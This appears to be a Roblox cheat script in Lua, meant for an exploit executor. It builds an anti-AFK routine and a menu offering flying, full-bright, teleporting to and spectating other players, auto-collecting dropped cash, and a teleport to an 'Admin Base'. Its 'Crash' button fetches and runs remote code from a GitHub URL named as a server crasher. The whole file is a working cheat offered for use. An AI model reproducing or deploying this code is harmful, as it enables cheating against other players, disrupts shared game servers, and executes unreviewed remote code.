wait(0.5)local ba=Instance.new("ScreenGui")
local ca=Instance.new("TextLabel")local da=Instance.new("Frame")
local _b=Instance.new("TextLabel")local ab=Instance.new("TextLabel")ba.Parent=game.CoreGui
ba.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;ca.Parent=ba;ca.Active=true
ca.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ca.Draggable=true
ca.Position=UDim2.new(0894267426272,727425632456,873275673563,62452545)ca.Size=UDim2.new(0,0,0)
ca.Font=Enum.Font.SourceSansSemibold;ca.Text="Anti AFK Script"ca.TextColor3=Color3.new(0,1,1)
ca.TextSize=22;da.Parent=ca
da.BackgroundColor3=Color3.new(0.196078,0.196078,0.196078)da.Position=UDim2.new(999,999,999)
da.Size=UDim2.new(0,370,0,107)_b.Parent=da
_b.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)_b.Position=UDim2.new(999,999,999)
_b.Size=UDim2.new(0,370,0,21)_b.Font=Enum.Font.Arial;_b.Text="made by ur mom "
_b.TextColor3=Color3.new(0,1,1)_b.TextSize=20;ab.Parent=da
ab.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ab.Position=UDim2.new(999,999,999)
ab.Size=UDim2.new(0,370,0,44)ab.Font=Enum.Font.ArialBold;ab.Text="Status: Active"
ab.TextColor3=Color3.new(0,1,1)ab.TextSize=20;local bb=game:service'VirtualUser'
game:service'Players'.LocalPlayer.Idled:connect(function()
	bb:CaptureController()bb:ClickButton2(Vector2.new())
	ab.Text="Roblox tried to kick u but i kicked him instead"wait(2)ab.Text="Status : Active"end)
local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local UICorner_2 = Instance.new("UICorner")
local MainPage = Instance.new("Frame")
local UICorner_3 = Instance.new("UICorner")
local Fly = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local NoFog = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local Players = Instance.new("TextBox")
local UICorner_6 = Instance.new("UICorner")
local GoTo = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local A_VIEW = Instance.new("TextButton")
local UICorner_8 = Instance.new("UICorner")
local TextLabel_2 = Instance.new("TextLabel")
local UICorner_9 = Instance.new("UICorner")
local I_CASHAURA = Instance.new("TextButton")
local UICorner_10 = Instance.new("UICorner")
local AdminBase = Instance.new("TextButton")
local UICorner_11 = Instance.new("UICorner")
local Crasher = Instance.new("TextButton")
local UICorner_12 = Instance.new("UICorner")
local TextLabel_3 = Instance.new("TextLabel")
local Coutenr = Instance.new("TextLabel")
local UICorner_13 = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
Frame.BorderColor3 = Color3.fromRGB(90, 0, 129)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.3723405, 0, 0.293121725, 0)
Frame.Size = UDim2.new(0, 358, 0, 390)

UICorner.Parent = Frame

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BackgroundTransparency = 0.650
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.0977653638, 0, 0.0205128212, 0)
TextLabel.Size = UDim2.new(0, 288, 0, 36)
TextLabel.Font = Enum.Font.GothamBlack
TextLabel.Text = "Username"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 19.000

UICorner_2.Parent = TextLabel

MainPage.Name = "MainPage"
MainPage.Parent = Frame
MainPage.BackgroundColor3 = Color3.fromRGB(126, 44, 185)
MainPage.BorderSizePixel = 0
MainPage.Position = UDim2.new(0.0195530299, 0, 0.128205135, 0)
MainPage.Size = UDim2.new(0, 345, 0, 333)

UICorner_3.Parent = MainPage

Fly.Name = "Fly"
Fly.Parent = MainPage
Fly.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
Fly.Position = UDim2.new(0.0346819013, 0, 0.0300303735, 0)
Fly.Size = UDim2.new(0, 156, 0, 40)
Fly.Font = Enum.Font.GothamBlack
Fly.Text = "Fly [X]"
Fly.TextColor3 = Color3.fromRGB(255, 255, 255)
Fly.TextSize = 17.000

UICorner_4.Parent = Fly

NoFog.Name = "NoFog"
NoFog.Parent = MainPage
NoFog.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
NoFog.Position = UDim2.new(0.512892067, 0, 0.0300303735, 0)
NoFog.Size = UDim2.new(0, 156, 0, 40)
NoFog.Font = Enum.Font.GothamBlack
NoFog.Text = "NoFog"
NoFog.TextColor3 = Color3.fromRGB(255, 255, 255)
NoFog.TextSize = 17.000

UICorner_5.Parent = NoFog

Players.Name = "Players"
Players.Parent = MainPage
Players.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
Players.BorderSizePixel = 0
Players.Position = UDim2.new(0.0317919068, 0, 0.180180177, 0)
Players.Size = UDim2.new(0, 322, 0, 33)
Players.Font = Enum.Font.GothamBlack
Players.PlaceholderText = "Players Name"
Players.Text = ""
Players.TextColor3 = Color3.fromRGB(255, 255, 255)
Players.TextSize = 17.000

UICorner_6.Parent = Players

GoTo.Name = "GoTo"
GoTo.Parent = MainPage
GoTo.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
GoTo.Position = UDim2.new(0.0317919068, 0, 0.297297627, 0)
GoTo.Size = UDim2.new(0, 155, 0, 40)
GoTo.Font = Enum.Font.GothamBlack
GoTo.Text = "GoTo"
GoTo.TextColor3 = Color3.fromRGB(255, 255, 255)
GoTo.TextSize = 17.000

UICorner_7.Parent = GoTo

A_VIEW.Name = "A_VIEW"
A_VIEW.Parent = MainPage
A_VIEW.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
A_VIEW.Position = UDim2.new(0.511690378, 0, 0.297297627, 0)
A_VIEW.Size = UDim2.new(0, 155, 0, 40)
A_VIEW.Font = Enum.Font.GothamBlack
A_VIEW.Text = "View"
A_VIEW.TextColor3 = Color3.fromRGB(255, 255, 255)
A_VIEW.TextSize = 17.000

UICorner_8.Parent = A_VIEW

TextLabel_2.Parent = MainPage
TextLabel_2.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0.0317919068, 0, 0.438438773, 0)
TextLabel_2.Size = UDim2.new(0, 321, 0, 39)
TextLabel_2.Font = Enum.Font.GothamBlack
TextLabel_2.Text = "Cash Aura"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 17.000
TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left

UICorner_9.Parent = TextLabel_2

I_CASHAURA.Name = "I_CASHAURA"
I_CASHAURA.Parent = MainPage
I_CASHAURA.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
I_CASHAURA.Position = UDim2.new(0.647398651, 0, 0.456456453, 0)
I_CASHAURA.Size = UDim2.new(0, 103, 0, 26)
I_CASHAURA.Font = Enum.Font.SourceSans
I_CASHAURA.Text = ""
I_CASHAURA.TextColor3 = Color3.fromRGB(0, 0, 0)
I_CASHAURA.TextSize = 14.000

UICorner_10.CornerRadius = UDim.new(0, 100)
UICorner_10.Parent = I_CASHAURA

AdminBase.Name = "AdminBase"
AdminBase.Parent = MainPage
AdminBase.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
AdminBase.Position = UDim2.new(0.0346819051, 0, 0.576576829, 0)
AdminBase.Size = UDim2.new(0, 152, 0, 40)
AdminBase.Font = Enum.Font.GothamBlack
AdminBase.Text = "Admin Base"
AdminBase.TextColor3 = Color3.fromRGB(255, 255, 255)
AdminBase.TextSize = 17.000

UICorner_11.Parent = AdminBase

Crasher.Name = "Crasher"
Crasher.Parent = MainPage
Crasher.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
Crasher.Position = UDim2.new(0.504761994, 0, 0.576576829, 0)
Crasher.Size = UDim2.new(0, 152, 0, 40)
Crasher.Font = Enum.Font.GothamBlack
Crasher.Text = "Crash"
Crasher.TextColor3 = Color3.fromRGB(255, 255, 255)
Crasher.TextSize = 17.000

UICorner_12.Parent = Crasher

TextLabel_3.Parent = MainPage
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(-0.00288999709, 0, 0.699699581, 0)
TextLabel_3.Size = UDim2.new(0, 346, 0, 23)
TextLabel_3.Font = Enum.Font.GothamMedium
TextLabel_3.LineHeight = 1.100
TextLabel_3.Text = "__________Cash Counter__________"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 19.000

Coutenr.Name = "Coutenr"
Coutenr.Parent = MainPage
Coutenr.BackgroundColor3 = Color3.fromRGB(90, 0, 129)
Coutenr.Position = UDim2.new(0.0317919068, 0, 0.789789796, 0)
Coutenr.Size = UDim2.new(0, 322, 0, 64)
Coutenr.Font = Enum.Font.GothamBlack
Coutenr.Text = "$100,000,000"
Coutenr.TextColor3 = Color3.fromRGB(255, 255, 255)
Coutenr.TextSize = 23.000

UICorner_13.Parent = Coutenr

-- Scripts:

local function FRHWUM_fake_script() -- TextLabel.LocalScript 
	local script = Instance.new('LocalScript', TextLabel)

	local player = game.Players.LocalPlayer
	
	if player then
		script.Parent.Text = ""..player.Name
	end
end
coroutine.wrap(FRHWUM_fake_script)()
local function GVMQ_fake_script() -- Fly.LocalScript 
	local script = Instance.new('LocalScript', Fly)

	script.Parent.MouseButton1Down:Connect(function()
		local plr = game.Players.LocalPlayer
		local mouse = plr:GetMouse()
	
		localplayer = plr
	
		if workspace:FindFirstChild("Core") then
			workspace.Core:Destroy()
		end
	
		local Core = Instance.new("Part")
		Core.Name = "Core"
		Core.Size = Vector3.new(0.05, 0.05, 0.05)
	
		spawn(function()
			Core.Parent = workspace
			local Weld = Instance.new("Weld", Core)
			Weld.Part0 = Core
			Weld.Part1 = localplayer.Character.LowerTorso
			Weld.C0 = CFrame.new(0, 0, 0)
		end)
	
		workspace:WaitForChild("Core")
	
		local torso = workspace.Core
		flying = true
		local speed=10
		local keys={a=false,d=false,w=false,s=false}
		local e1
		local e2
		local function start()
			local pos = Instance.new("BodyPosition",torso)
			local gyro = Instance.new("BodyGyro",torso)
			pos.Name="EPIXPOS"
			pos.maxForce = Vector3.new(math.huge, math.huge, math.huge)
			pos.position = torso.Position
			gyro.maxTorque = Vector3.new(9e9, 9e9, 9e9)
			gyro.cframe = torso.CFrame
			repeat
				wait()
				localplayer.Character.Humanoid.PlatformStand=true
				local new=gyro.cframe - gyro.cframe.p + pos.position
				if not keys.w and not keys.s and not keys.a and not keys.d then
					speed=5
				end
				if keys.w then
					new = new + workspace.CurrentCamera.CoordinateFrame.lookVector * speed
					speed=speed+0
				end
				if keys.s then
					new = new - workspace.CurrentCamera.CoordinateFrame.lookVector * speed
					speed=speed+0
				end
				if keys.d then
					new = new * CFrame.new(speed,0,0)
					speed=speed+0
				end
				if keys.a then
					new = new * CFrame.new(-speed,0,0)
					speed=speed+0
				end
				if speed>10 then
					speed=5
				end
				pos.position=new.p
				if keys.w then
					gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(-math.rad(speed*0),0,0)
				elseif keys.s then
					gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(math.rad(speed*0),0,0)
				else
					gyro.cframe = workspace.CurrentCamera.CoordinateFrame
				end
			until flying == false
			if gyro then gyro:Destroy() end
			if pos then pos:Destroy() end
			flying=false
			localplayer.Character.Humanoid.PlatformStand=false
			speed=10
		end
		e1=mouse.KeyDown:connect(function(key)
			if not torso or not torso.Parent then flying=false e1:disconnect() e2:disconnect() return end
			if key=="w" then
				keys.w=true
			elseif key=="s" then
				keys.s=true
			elseif key=="a" then
				keys.a=true
			elseif key=="d" then
				keys.d=true
			elseif key=="x" then
				if flying==true then
					flying=false
				else
					flying=true
					start()
				end
			end
		end)
		e2=mouse.KeyUp:connect(function(key)
			if key=="w" then
				keys.w=false
			elseif key=="s" then
				keys.s=false
			elseif key=="a" then
				keys.a=false
			elseif key=="d" then
				keys.d=false
			end
		end)
		start()
	end)
end
coroutine.wrap(GVMQ_fake_script)()
local function YDRJFQ_fake_script() -- NoFog.LocalScript 
	local script = Instance.new('LocalScript', NoFog)

	script.Parent.MouseButton1Down:Connect(function()
		if not _G.FullBrightExecuted then
	
			_G.FullBrightEnabled = false
	
			_G.NormalLightingSettings = {
				Brightness = game:GetService("Lighting").Brightness,
				ClockTime = game:GetService("Lighting").ClockTime,
				FogEnd = game:GetService("Lighting").FogEnd,
				GlobalShadows = game:GetService("Lighting").GlobalShadows,
				Ambient = game:GetService("Lighting").Ambient
			}
	
			game:GetService("Lighting"):GetPropertyChangedSignal("Brightness"):Connect(function()
				if game:GetService("Lighting").Brightness ~= 1 and game:GetService("Lighting").Brightness ~= _G.NormalLightingSettings.Brightness then
					_G.NormalLightingSettings.Brightness = game:GetService("Lighting").Brightness
					if not _G.FullBrightEnabled then
						repeat
							wait()
						until _G.FullBrightEnabled
					end
					game:GetService("Lighting").Brightness = 1
				end
			end)
	
			game:GetService("Lighting"):GetPropertyChangedSignal("ClockTime"):Connect(function()
				if game:GetService("Lighting").ClockTime ~= 12 and game:GetService("Lighting").ClockTime ~= _G.NormalLightingSettings.ClockTime then
					_G.NormalLightingSettings.ClockTime = game:GetService("Lighting").ClockTime
					if not _G.FullBrightEnabled then
						repeat
							wait()
						until _G.FullBrightEnabled
					end
					game:GetService("Lighting").ClockTime = 12
				end
			end)
	
			game:GetService("Lighting"):GetPropertyChangedSignal("FogEnd"):Connect(function()
				if game:GetService("Lighting").FogEnd ~= 786543 and game:GetService("Lighting").FogEnd ~= _G.NormalLightingSettings.FogEnd then
					_G.NormalLightingSettings.FogEnd = game:GetService("Lighting").FogEnd
					if not _G.FullBrightEnabled then
						repeat
							wait()
						until _G.FullBrightEnabled
					end
					game:GetService("Lighting").FogEnd = 786543
				end
			end)
	
			game:GetService("Lighting"):GetPropertyChangedSignal("GlobalShadows"):Connect(function()
				if game:GetService("Lighting").GlobalShadows ~= false and game:GetService("Lighting").GlobalShadows ~= _G.NormalLightingSettings.GlobalShadows then
					_G.NormalLightingSettings.GlobalShadows = game:GetService("Lighting").GlobalShadows
					if not _G.FullBrightEnabled then
						repeat
							wait()
						until _G.FullBrightEnabled
					end
					game:GetService("Lighting").GlobalShadows = false
				end
			end)
	
			game:GetService("Lighting"):GetPropertyChangedSignal("Ambient"):Connect(function()
				if game:GetService("Lighting").Ambient ~= Color3.fromRGB(178, 178, 178) and game:GetService("Lighting").Ambient ~= _G.NormalLightingSettings.Ambient then
					_G.NormalLightingSettings.Ambient = game:GetService("Lighting").Ambient
					if not _G.FullBrightEnabled then
						repeat
							wait()
						until _G.FullBrightEnabled
					end
					game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)
				end
			end)
	
			game:GetService("Lighting").Brightness = 1
			game:GetService("Lighting").ClockTime = 12
			game:GetService("Lighting").FogEnd = 786543
			game:GetService("Lighting").GlobalShadows = false
			game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)
	
			local LatestValue = true
			spawn(function()
				repeat
					wait()
				until _G.FullBrightEnabled
				while wait() do
					if _G.FullBrightEnabled ~= LatestValue then
						if not _G.FullBrightEnabled then
							game:GetService("Lighting").Brightness = _G.NormalLightingSettings.Brightness
							game:GetService("Lighting").ClockTime = _G.NormalLightingSettings.ClockTime
							game:GetService("Lighting").FogEnd = _G.NormalLightingSettings.FogEnd
							game:GetService("Lighting").GlobalShadows = _G.NormalLightingSettings.GlobalShadows
							game:GetService("Lighting").Ambient = _G.NormalLightingSettings.Ambient
						else
							game:GetService("Lighting").Brightness = 1
							game:GetService("Lighting").ClockTime = 12
							game:GetService("Lighting").FogEnd = 786543
							game:GetService("Lighting").GlobalShadows = false
							game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)
						end
						LatestValue = not LatestValue
					end
				end
			end)
		end
	
		_G.FullBrightExecuted = true
		_G.FullBrightEnabled = not _G.FullBrightEnabled
	end)
end
coroutine.wrap(YDRJFQ_fake_script)()
local function OXYW_fake_script() -- GoTo.LocalScript 
	local script = Instance.new('LocalScript', GoTo)

	script.Parent.MouseButton1Down:Connect(function()
		game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players[Players.Text].Character.UpperTorso.Position)
	end)
end
coroutine.wrap(OXYW_fake_script)()
local function MYYPDZU_fake_script() -- A_VIEW.LocalScript 
	local script = Instance.new('LocalScript', A_VIEW)

	script.Parent.MouseButton1Click:connect(function()
		if A_VIEW.Text == 'VIEW' then
			A_VIEW.Text = 'UNVIEW'
			repeat view(Players.Text) until A_VIEW.Text == 'VIEW'
			game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA('Humanoid')
		else
			A_VIEW.Text = 'VIEW'
		end
	end)
	function view(plr)
		wait()
		if game.Players:FindFirstChild(plr) then
			if game.Players[plr].Character then
				game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = game.Players:FindFirstChild(plr).Character.HumanoidRootPart
			else
				A_VIEW.Text = 'VIEW'
			end
		else
			A_VIEW.Text = 'VIEW'
		end
	end
end
coroutine.wrap(MYYPDZU_fake_script)()
local function ZNYGL_fake_script() -- I_CASHAURA.LocalScript 
	local script = Instance.new('LocalScript', I_CASHAURA)

	script.Parent.MouseButton1Click:connect(function()
		if I_CASHAURA.BackgroundColor3 == Color3.fromRGB(255, 255, 255) then I_CASHAURA.BackgroundColor3 = Color3.fromRGB(85, 0, 127) game:GetService('RunService'):BindToRenderStep("Cash-Aura", 0 , function()
				for i,v in pairs(game:GetService('Workspace')['Ignored']['Drop']:GetChildren()) do
					if v:IsA('Part') then
						if (v.Position - game.Players.LocalPlayer.Character.HumanoidRootPart.Position).Magnitude <= 12 then
							fireclickdetector(v:FindFirstChild('ClickDetector'))
						end
					end
				end
			end)
		else I_CASHAURA.BackgroundColor3 = Color3.fromRGB(255, 255, 255) game:GetService('RunService'):UnbindFromRenderStep("Cash-Aura") end
	end)
end
coroutine.wrap(ZNYGL_fake_script)()
local function LIFK_fake_script() -- AdminBase.LocalScript 
	local script = Instance.new('LocalScript', AdminBase)

	script.Parent.MouseButton1Down:Connect(function()
		game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-870.683411, -38.1640587, -543.924683, 0.999991834, -3.43428264e-09, -0.00404249178, 3.32334316e-09, 1, -2.74500618e-08, 0.00404249178, 2.74364034e-08, 0.999991834)
	end)
end
coroutine.wrap(LIFK_fake_script)()
local function XCOG_fake_script() -- Crasher.LocalScript 
	local script = Instance.new('LocalScript', Crasher)

	script.Parent.MouseButton1Down:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
	end)
end
coroutine.wrap(XCOG_fake_script)()
local function HBJDV_fake_script() -- Coutenr.LocalScript 
	local script = Instance.new('LocalScript', Coutenr)

	while wait() do
		pcall(function()
			local amount = 0
			for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
				if v.Name == "MoneyDrop" then
					local cash = string.split(v.BillboardGui.TextLabel.Text,"$")[2]
					if string.match(cash,',') then
						amount = amount + cash:gsub("%,","")
					else
						amount = amount + cash
					end
				end
			end
			local function checking(amount)
				amount = tostring(amount)
				return amount:reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
			end
			script.Parent.Text = "$"..checking(amount).." "
		end)
	end
end
coroutine.wrap(HBJDV_fake_script)()
local function SWJGYY_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	local UIS = game:GetService('UserInputService')
	local frame = script.Parent
	local dragToggle = nil
	local dragSpeed = 0.25
	local dragStart = nil
	local startPos = nil
	
	local function updateInput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		game:GetService('TweenService'):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end
	
	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then 
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)
	
	UIS.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updateInput(input)
			end
		end
	end)
end
coroutine.wrap(SWJGYY_fake_script)()
